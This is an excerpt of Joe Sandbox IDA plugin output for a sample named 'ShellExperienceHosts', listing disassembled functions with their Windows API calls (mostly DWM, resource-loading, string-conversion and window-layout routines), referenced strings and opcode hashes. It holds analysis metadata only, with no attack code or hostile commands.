Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CtrlH_prolog3
String ID: %TsBasePane-%d$%TsBasePane-%d%x$BasePanes$IsVisible
API String ID: 3125906040-2169875744
Opcode ID: c14dca69c9b130034900a1f73c719d0f583df196cbc09e9d465bbd4d32c819bd
Instruction ID: 4087bf5de7a3e67ce6783b4226cfef6d9b4daf5e4a10acbe916da5f48fd7e1e4
Opcode Fuzzy Hash: c14dca69c9b130034900a1f73c719d0f583df196cbc09e9d465bbd4d32c819bd
Instruction Fuzzy Hash: E331B035A00259ABCF00DFA4CC84DFEBB75BFA9318F184529E916B7791CB349909EB50

Function 6CA3F890 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CA3F897

Part of subcall function 6C9BE402: GetDlgCtrlID.USER32(?), ref: 6C9BE40D

Strings

IsVisible, xrefs: 6CA3F94A
%TsBasePane-%d%x, xrefs: 6CA3F8FB
%TsBasePane-%d, xrefs: 6CA3F8E4
BasePanes, xrefs: 6CA3F8A7

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CtrlH_prolog3
String ID: %TsBasePane-%d$%TsBasePane-%d%x$BasePanes$IsVisible
API String ID: 3125906040-2169875744
Opcode ID: 5dad67d3c9f0d9b2fe03a5fc5c7dff2d34ac9538a3ff910e07224182bf25c103
Instruction ID: 96e99201fa31b925f2c3f3400abb1f826273504ed6b7273d5f1d902b47564688
Opcode Fuzzy Hash: 5dad67d3c9f0d9b2fe03a5fc5c7dff2d34ac9538a3ff910e07224182bf25c103
Instruction Fuzzy Hash: B131BE75A00219ABCF00DFA4C8849FEBBB5BF58318F180169E819B7780CB319E49DB60

Function 6C9CFBE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

Edit, xrefs: 6C9CFC40

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 91068b5b2fddc151e8707a260c8fe26c37cfae8467170478539946fa108482f9
Instruction ID: badd68769afd27b631b27e11ee4b7ea50c3a11d4b1029eff592d4091a4491030
Opcode Fuzzy Hash: 91068b5b2fddc151e8707a260c8fe26c37cfae8467170478539946fa108482f9
Instruction Fuzzy Hash: 6311E5313C1201ABEF200A31CC44BA676ECAF5A7DDF114535E855E2CA0CB71D401C653

Function 6C9E3A19 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50libraryfileloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,?,?,00000000,00000000,?,?,6C9E377B,3E6EA3C2), ref: 6C9E3A2C
GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 6C9E3A3C
CreateFileW.KERNEL32(?,?,3E6EA3C2,6C9E377B,?,?,00000000,?,00000000,?,?,00000000,00000000,?,?,6C9E377B), ref: 6C9E3A85

Strings

CreateFileTransactedW, xrefs: 6C9E3A36
kernel32.dll, xrefs: 6C9E3A27

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AddressCreateFileHandleModuleProc
String ID: CreateFileTransactedW$kernel32.dll
API String ID: 2580138172-2053874626
Opcode ID: 077f84713db2cb2752934f2ab2fc6ed8064127ee93a86c49a669f2fdedd384c6
Instruction ID: 446771af65f1dcc4be483d3413490e76f9cb0e39a71353b7ee072a3c6b011b6a
Opcode Fuzzy Hash: 077f84713db2cb2752934f2ab2fc6ed8064127ee93a86c49a669f2fdedd384c6
Instruction Fuzzy Hash: E4010C3620015EFFDF124EA4DC48CAA3BBEFF59394B144629FA2952520C732C861AB50

Function 6C9D38D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9D38D7
GetClassNameW.USER32(?,00000000,00000400), ref: 6C9D3908
GetWindowLongW.USER32(?,000000F0), ref: 6C9D3941

Strings

ComboBox, xrefs: 6C9D391B
ComboBoxEx32, xrefs: 6C9D392C

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ClassH_prolog3LongNameWindow
String ID: ComboBox$ComboBoxEx32
API String ID: 297531199-1907415764
Opcode ID: dcaad2996f1d8d6f740d5be753053a8b15b05f930d1f72361ea0d6148cd8e260
Instruction ID: d2cbd5b9a9e43c884178e95ed1e7ebfa4a7a2a2c7383fba498203df3572505f4
Opcode Fuzzy Hash: dcaad2996f1d8d6f740d5be753053a8b15b05f930d1f72361ea0d6148cd8e260
Instruction Fuzzy Hash: 8401AD75405162EBEB019AA4CD14FEEB378BF32339F100518E425B2AC0DF30F449CA94

Function 6CA39EBA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(00000000,?,PNG,?,?,?,6CB42EC0,?,6CA3ACD1,?,?,?,00000038,6CA3998F), ref: 6CA39EDC
LoadResource.KERNEL32(00000000,00000000,?,6CB42EC0,?,6CA3ACD1,?,?,?,00000038,6CA3998F), ref: 6CA39EEA
LockResource.KERNEL32(00000000,?,6CB42EC0,?,6CA3ACD1,?,?,?,00000038,6CA3998F), ref: 6CA39EF5
SizeofResource.KERNEL32(00000000,00000000,?,6CB42EC0,?,6CA3ACD1,?,?,?,00000038,6CA3998F), ref: 6CA39F03

Strings

PNG, xrefs: 6CA39ED3

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: PNG
API String ID: 3473537107-364855578
Opcode ID: a9c4072cee5b6b09083195142ff77b01769ec07f171a1618b056f26a8b8689ea
Instruction ID: cf3b8fd07cbef07e185b5261f0e90fca35be941b37c4cb8268eb1898f3fb2478
Opcode Fuzzy Hash: a9c4072cee5b6b09083195142ff77b01769ec07f171a1618b056f26a8b8689ea
Instruction Fuzzy Hash: CAF0CD36205661BB9B115BB99D1CCAF3B7CEF866683145019B90CE3701EF30DA4086F1

Function 6CB04FA6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3E6EA3C2,?,?,00000000,6CB21BEA,000000FF,?,6CB04F3E,00000000,?,6CB04F12,?), ref: 6CB04FDB
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CB04FED
FreeLibrary.KERNEL32(00000000,?,?,00000000,6CB21BEA,000000FF,?,6CB04F3E,00000000,?,6CB04F12,?), ref: 6CB0500F

Strings

CorExitProcess, xrefs: 6CB04FE5
mscoree.dll, xrefs: 6CB04FD4

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bba1c3298e45608b7a7c81ed25cfc4f06be05a1e5c1f5a52f934daa0cacd30a6
Instruction ID: 3733e0f2ef367890b5c592880ed4ba495110fbf8c868ac8a0cbca8c356662782
Opcode Fuzzy Hash: bba1c3298e45608b7a7c81ed25cfc4f06be05a1e5c1f5a52f934daa0cacd30a6
Instruction Fuzzy Hash: B3016235A14599ABDB218F90CC08BAEBBBCFB05765F004525F826E3A90EB75D904CA94

Function 6C9D40BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6C9D40F3

Part of subcall function 6C9B897D: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6C9B89A3
Part of subcall function 6C9B897D: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C9B89B3
Part of subcall function 6C9B897D: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6C9B89BC

GetProcAddress.KERNEL32(00000000,DwmDefWindowProc), ref: 6C9D40DC
EncodePointer.KERNEL32(00000000), ref: 6C9D40E5

Strings

dwmapi.dll, xrefs: 6C9D40C7
DwmDefWindowProc, xrefs: 6C9D40D6

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: DwmDefWindowProc$dwmapi.dll
API String ID: 1102202064-234806475
Opcode ID: ad03ebe88f639b6701f883bbec85629a1b01b83e32aabd329c8de7bbddb1c8e3
Instruction ID: 48c8805e3b9133e8d642ab249451a1d9e4c101bc337ddc456162ed6a832218b2
Opcode Fuzzy Hash: ad03ebe88f639b6701f883bbec85629a1b01b83e32aabd329c8de7bbddb1c8e3
Instruction Fuzzy Hash: EAF0303560666BAB8F112FB5EC0485E3F78BF2A7A57018421FD09E3610DB31D9109FA0

Function 6C9D41DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6C9D4213

Part of subcall function 6C9B897D: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6C9B89A3
Part of subcall function 6C9B897D: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C9B89B3
Part of subcall function 6C9B897D: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6C9B89BC

GetProcAddress.KERNEL32(00000000,DwmSetIconicLivePreviewBitmap), ref: 6C9D41FC
EncodePointer.KERNEL32(00000000), ref: 6C9D4205

Strings

dwmapi.dll, xrefs: 6C9D41E7
DwmSetIconicLivePreviewBitmap, xrefs: 6C9D41F6

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: DwmSetIconicLivePreviewBitmap$dwmapi.dll
API String ID: 1102202064-1757063745
Opcode ID: a7badead6f2e1cacb85068a1824b3034539a4bb818ec055722aa8012c09ea5eb
Instruction ID: 3d2095c5e61538e639923020714f7f83692442b153950e8ac797c3a8f974ac22
Opcode Fuzzy Hash: a7badead6f2e1cacb85068a1824b3034539a4bb818ec055722aa8012c09ea5eb
Instruction Fuzzy Hash: 49F0FB75645A97ABCF115FA59C08C5D3B78BF067647018415FD19F7610D730D9109EA0

Function 6C9D42A1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6C9D42DA

Part of subcall function 6C9B897D: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6C9B89A3
Part of subcall function 6C9B897D: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C9B89B3
Part of subcall function 6C9B897D: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6C9B89BC

GetProcAddress.KERNEL32(00000000,DwmSetWindowAttribute), ref: 6C9D42C3
EncodePointer.KERNEL32(00000000), ref: 6C9D42CC

Strings

dwmapi.dll, xrefs: 6C9D42AE
DwmSetWindowAttribute, xrefs: 6C9D42BD

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: DwmSetWindowAttribute$dwmapi.dll
API String ID: 1102202064-3105884578
Opcode ID: 4364069e7c2fcbf8a1abad56a4e4373fa1ff1a0eb81abefe07cfd4d0b74210ea
Instruction ID: a54cb3529182034be813c89b2d6fbffe9f9fec4789ec143920af2d0326227b81
Opcode Fuzzy Hash: 4364069e7c2fcbf8a1abad56a4e4373fa1ff1a0eb81abefe07cfd4d0b74210ea
Instruction Fuzzy Hash: 35F05479602AABBBCF111F75ED0885E3BB9AF0A7657414521FD0AE7A10DB30D8108EE0

Function 6C9D417B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6C9D41B4

Part of subcall function 6C9B897D: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6C9B89A3
Part of subcall function 6C9B897D: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C9B89B3
Part of subcall function 6C9B897D: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6C9B89BC

GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 6C9D419D
EncodePointer.KERNEL32(00000000), ref: 6C9D41A6

Strings

dwmapi.dll, xrefs: 6C9D4188
DwmIsCompositionEnabled, xrefs: 6C9D4197

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: DwmIsCompositionEnabled$dwmapi.dll
API String ID: 1102202064-1198327662
Opcode ID: ae4c414db0224a465cabb362fd4e561e67c5a4ac5727c906674fd9b417ff9480
Instruction ID: 0dad73ea0bacc7d0b0858c88b611d5208f163ee9992ba37d401c3deb0c642431
Opcode Fuzzy Hash: ae4c414db0224a465cabb362fd4e561e67c5a4ac5727c906674fd9b417ff9480
Instruction Fuzzy Hash: 26F05475602B56AFCF115B74EC0495D36B8BF27665B014116EC0DE7A04DB30EA009EA0

Function 6C9D423F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6C9D4278

Part of subcall function 6C9B897D: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6C9B89A3
Part of subcall function 6C9B897D: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C9B89B3
Part of subcall function 6C9B897D: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6C9B89BC

GetProcAddress.KERNEL32(00000000,DwmSetIconicThumbnail), ref: 6C9D4261
EncodePointer.KERNEL32(00000000), ref: 6C9D426A

Strings

dwmapi.dll, xrefs: 6C9D424C
DwmSetIconicThumbnail, xrefs: 6C9D425B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: DwmSetIconicThumbnail$dwmapi.dll
API String ID: 1102202064-2331651847
Opcode ID: 42509d0182bf62e7990f76976180977a4aec59761a682d32534f3f83f7bf9405
Instruction ID: c88851dbe466649d74bd46955142c1efbcb3c6e20d3f0add103c7cbceb047710
Opcode Fuzzy Hash: 42509d0182bf62e7990f76976180977a4aec59761a682d32534f3f83f7bf9405
Instruction Fuzzy Hash: C7F05479642BA6AB9F111F74AC0885D3B7CAF067747024411FD0AE7610D730E900CEA0

Function 6C9D411F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6C9D4158

Part of subcall function 6C9B897D: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6C9B89A3
Part of subcall function 6C9B897D: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C9B89B3
Part of subcall function 6C9B897D: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6C9B89BC

GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 6C9D4141
EncodePointer.KERNEL32(00000000), ref: 6C9D414A

Strings

dwmapi.dll, xrefs: 6C9D412C
DwmInvalidateIconicBitmaps, xrefs: 6C9D413B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: DwmInvalidateIconicBitmaps$dwmapi.dll
API String ID: 1102202064-1901905683
Opcode ID: 616ef8d78f0cd65c3c42905c96a8c2419f855c8f177aae965351ac8766ace6eb
Instruction ID: 4408058e97e7062ce2ca1dc42961fa3c21bb83f95218566bb94af58a93c29dd5
Opcode Fuzzy Hash: 616ef8d78f0cd65c3c42905c96a8c2419f855c8f177aae965351ac8766ace6eb
Instruction Fuzzy Hash: 32F0A779702A6BEB8F112B74AC0885D36BC6F3B6A57014012FC19F7A00DB20EA009EA4

Function 6C9AE270 Relevance: 7.9, APIs: 5, Instructions: 421COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?), ref: 6C9AE5A3
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000000,?,?,?,?,?,?,?), ref: 6C9AE5E5
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 6C9AE5FA
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C9AE62C

Part of subcall function 6C9A2570: ___std_exception_copy.LIBVCRUNTIME ref: 6C9A259E

Concurrency::cancel_current_task.LIBCPMT ref: 6C9AE707

Part of subcall function 6C9A24D0: ___std_exception_copy.LIBVCRUNTIME ref: 6C9A250E

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ByteCharMultiWide$___std_exception_copy$Concurrency::cancel_current_task
String ID:
API String ID: 453999986-0
Opcode ID: bb2f675b2431bba7770e53e89317d9fc59bfa4cd081bcf0162aaa891fe92168a
Instruction ID: b19c57b7a4b3db214fb9e86648f45624f3203e6a2d52e80568af7b8a5c2eeb8d
Opcode Fuzzy Hash: bb2f675b2431bba7770e53e89317d9fc59bfa4cd081bcf0162aaa891fe92168a
Instruction Fuzzy Hash: D5F1E270D051499FCB14CFE8C950BEEFBB9AF4A304F24425AE864B7781D7349906CBA1

Function 6C9DE14D Relevance: 7.9, APIs: 5, Instructions: 385COMMON

Download Yara Rule

APIs

Part of subcall function 6C9DDFF6: PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 6C9DE030
Part of subcall function 6C9DDFF6: SetRectEmpty.USER32(?), ref: 6C9DE058
Part of subcall function 6C9DDFF6: GetDesktopWindow.USER32 ref: 6C9DE070
Part of subcall function 6C9DDFF6: LockWindowUpdate.USER32(?,00000000), ref: 6C9DE081
Part of subcall function 6C9DDFF6: GetDCEx.USER32(?,00000000,00000003), ref: 6C9DE098

Part of subcall function 6C9C7BCD: GetLayout.GDI32(?,6C9DE17E), ref: 6C9C7BD0

GetWindowRect.USER32(?,?), ref: 6C9DE1AF

Part of subcall function 6C9C8149: SetLayout.GDI32(?,?), ref: 6C9C8152

Part of subcall function 6C9DD44C: AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 6C9DD45C

InflateRect.USER32(?,00000002,00000002), ref: 6C9DE4CD
InflateRect.USER32(00000000,00000002,00000002), ref: 6C9DE4E4

Part of subcall function 6C9DEB00: OffsetRect.USER32(?,00000000,00000000), ref: 6C9DEB39

Part of subcall function 6C9DE0AF: OffsetRect.USER32(?,?,?), ref: 6C9DE0C9
Part of subcall function 6C9DE0AF: OffsetRect.USER32(?,?,?), ref: 6C9DE0D5
Part of subcall function 6C9DE0AF: OffsetRect.USER32(?,?,?), ref: 6C9DE0E1
Part of subcall function 6C9DE0AF: OffsetRect.USER32(?,?,?), ref: 6C9DE0ED

